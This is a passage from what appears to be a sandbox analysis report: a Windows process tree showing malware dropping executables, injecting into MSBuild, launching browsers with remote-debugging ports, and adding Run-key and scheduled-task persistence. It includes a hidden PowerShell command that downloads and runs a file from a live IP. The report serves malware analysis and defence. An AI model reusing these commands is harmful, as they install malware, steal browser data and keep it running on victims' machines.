        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4280,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4308 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:2980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4448 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5332,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5344 /prefetch:8
        11⤵
        
        PID:4072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5584,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5568 /prefetch:8
        11⤵
        
        PID:5868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5592,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5580 /prefetch:8
        11⤵
        
        PID:5980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
        11⤵
        
        PID:1248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5728,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5344 /prefetch:8
        11⤵
        
        PID:4732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5980 /prefetch:8
        11⤵
        
        PID:5368
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:4600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ffd49e7f208,0x7ffd49e7f214,0x7ffd49e7f220
        11⤵
        
        PID:1540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,2135321125383815115,17605759933968947383,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:3
        11⤵
        
        PID:5516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2688,i,2135321125383815115,17605759933968947383,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:2
        11⤵
        
        PID:4988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2256,i,2135321125383815115,17605759933968947383,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:8
        11⤵
        
        PID:5084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,2135321125383815115,17605759933968947383,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:6128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3520,i,2135321125383815115,17605759933968947383,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2464
        
        C:\ProgramData\00hdtj58q9.exe
        
        "C:\ProgramData\00hdtj58q9.exe"
        10⤵
        
        PID:6372
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:7140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:7032
        
        C:\ProgramData\00z58g4wtr.exe
        
        "C:\ProgramData\00z58g4wtr.exe"
        10⤵
        
        PID:4860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:5200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:12544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd5a57dcf8,0x7ffd5a57dd04,0x7ffd5a57dd10
        13⤵
        
        PID:12560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1968,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
        13⤵
        
        PID:12916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2432,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:2
        13⤵
        
        PID:12924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2084,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
        13⤵
        
        PID:12940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:12960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=3252 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:12968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:2
        13⤵
        Uses browser remote debugging
        
        PID:13100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4408,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=4636 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:3216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5080,i,299524134348715692,11012183760367479212,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:8
        13⤵
        
        PID:21172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:25484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        13⤵
        Uses browser remote debugging
        
        PID:25524
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffd4974f208,0x7ffd4974f214,0x7ffd4974f220
        14⤵
        
        PID:25580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1892,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:3
        14⤵
        
        PID:19764
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2612,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=2604 /prefetch:2
        14⤵
        
        PID:19736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1812,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:8
        14⤵
        
        PID:19728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3508,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:19528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:25336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4168,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:8
        14⤵
        
        PID:9548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5280,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:8
        14⤵
        
        PID:4372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5664,i,1032125564181996017,7993780198993036869,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:8
        14⤵
        
        PID:13236
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GIJDAFBKFI.exe"
        12⤵
        
        PID:17968
        
        C:\Users\Admin\GIJDAFBKFI.exe
        
        "C:\Users\Admin\GIJDAFBKFI.exe"
        13⤵
        
        PID:17884
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:17860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:17840
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:17832
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\ECGIIIDAKJ.exe"
        12⤵
        
        PID:17696
        
        C:\Users\Admin\ECGIIIDAKJ.exe
        
        "C:\Users\Admin\ECGIIIDAKJ.exe"
        13⤵
        
        PID:17640
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:17620
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\BFCGDAAKFH.exe"
        12⤵
        
        PID:17512
        
        C:\Users\Admin\BFCGDAAKFH.exe
        
        "C:\Users\Admin\BFCGDAAKFH.exe"
        13⤵
        
        PID:17096
        
        C:\Users\Admin\AppData\Local\Temp\8hiuqMAF\wfbNuxzIZEhDeWKD.exe
        
        C:\Users\Admin\AppData\Local\Temp\8hiuqMAF\wfbNuxzIZEhDeWKD.exe 0
        14⤵
        
        PID:17052
        
        C:\Users\Admin\AppData\Local\Temp\8hiuqMAF\cH1q60rxA8KM9jPX.exe
        
        C:\Users\Admin\AppData\Local\Temp\8hiuqMAF\cH1q60rxA8KM9jPX.exe 17052
        15⤵
        
        PID:16992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 16992 -s 464
        16⤵
        Program crash
        
        PID:20108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 17052 -s 728
        15⤵
        Program crash
        
        PID:20168
        
        C:\ProgramData\l6xtrq1vs0.exe
        
        "C:\ProgramData\l6xtrq1vs0.exe"
        10⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\fL8AvfRMZnVfIY0a.exe
        
        C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\fL8AvfRMZnVfIY0a.exe 0
        11⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\4p2sShI6tLW6eZaL.exe
        
        C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\4p2sShI6tLW6eZaL.exe 1068
        12⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 3448
        13⤵
        Program crash
        
        PID:26008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1256
        12⤵
        Program crash
        
        PID:21012
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2vkxt" & exit
        10⤵
        
        PID:12304
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        
        PID:5340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\is-MERGB.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MERGB.tmp\Bell_Setup16.tmp" /SL5="$14026A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\is-JU8OU.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JU8OU.tmp\Bell_Setup16.tmp" /SL5="$15026A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        9⤵
        
        PID:4860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        10⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        11⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        
        PID:6020
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
        13⤵
        Modifies registry key
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupportw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe\"'"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        8⤵
        
        PID:4736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4852
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\10043990101\9bb3bffccd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043990101\9bb3bffccd.exe"
        8⤵
        
        PID:9400
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043990101\9bb3bffccd.exe"
        9⤵
        
        PID:25880
        
        C:\Users\Admin\AppData\Local\Temp\10044000101\54685a9cee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044000101\54685a9cee.exe"
        8⤵
        
        PID:12932
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044000101\54685a9cee.exe"
        9⤵
        
        PID:9564
      - C:\Users\Admin\AppData\Local\Temp\10369180101\9bbb0f64a5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369180101\9bbb0f64a5.exe"
        6⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn sZ4aTmattX0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\HlmGP5OoS.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn sZ4aTmattX0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\HlmGP5OoS.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3220
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\HlmGP5OoS.hta
        7⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YIRSRWKXOZ7OCON6IAR5EKWZVSK9T1DY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\TempYIRSRWKXOZ7OCON6IAR5EKWZVSK9T1DY.EXE
        
        "C:\Users\Admin\AppData\Local\TempYIRSRWKXOZ7OCON6IAR5EKWZVSK9T1DY.EXE"
        9⤵
        
        PID:2068
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
        6⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2604
        
        C:\Windows\SysWOW64\cmd.exe
        
